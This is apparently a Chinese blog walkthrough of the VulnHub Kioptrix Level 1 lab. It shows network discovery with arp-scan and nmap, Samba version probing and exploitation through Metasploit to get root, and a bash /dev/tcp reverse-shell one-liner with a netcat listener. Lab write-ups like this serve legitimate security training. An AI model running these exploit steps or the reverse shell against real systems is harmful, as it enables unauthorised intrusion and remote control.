vulnhub Kioptrix Level 1通关

本文详细描述了如何在KioptrixLevel1靶机环境中进行环境安装、IP搜寻、端口扫描,利用Samba漏洞实现RCE,并通过反弹shell获取root权限的过程。作者还分享了一种推荐的通关方法,以及在其中遇到的一个问题。
摘要由CSDN通过智能技术生成

目录

环境安装

信息收集

0X01靶机IP搜寻

1.1ifconfig查看本机IP域

1.2.nmap搜寻IP

2.直接arp-scan指令查看IP

0X02端口扫描

0X03漏洞利用

反弹shell

另一种通关方法推荐


环境安装

靶机下载:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar

攻击机:kali2023

开始渗透!!!

信息收集

0X01靶机IP搜寻

1.1ifconfig查看本机IP域

1.2.nmap搜寻IP

2.直接arp-scan指令查看IP

arp-scan -l

0X02端口扫描

nmap -A -p- 192.168.232.129

发现Samba的绑定服务器的139端口,我们使用msf探测一下Samba的版本

msfconsole
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.232.129
run

0X03漏洞利用

msf搜索samba

search samba

 使用现成的

注意一下可以使用的版本为Samba 2.2.x - Bruteforce所以可以使用

再利用

set payload linux/x86/shell_bind_tcp
set rhosts 192.168.232.129
show options
run

成功rce,已经拿到root权限。

反弹shell

先监听攻击机kali端口1234

nc -lvp 1234

然后就是rce输入反弹shell命令(此处由于kali的IP写错了,多写了几次)

bash -i >& /dev/tcp/192.168.232.128/1234 0>&1

发现成功连接,反弹shell

另一种通关方法推荐

推文:https://www.cnblogs.com/jason-huawen/p/16950944.html

 但是我看在其中一步,没能成功getshell!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值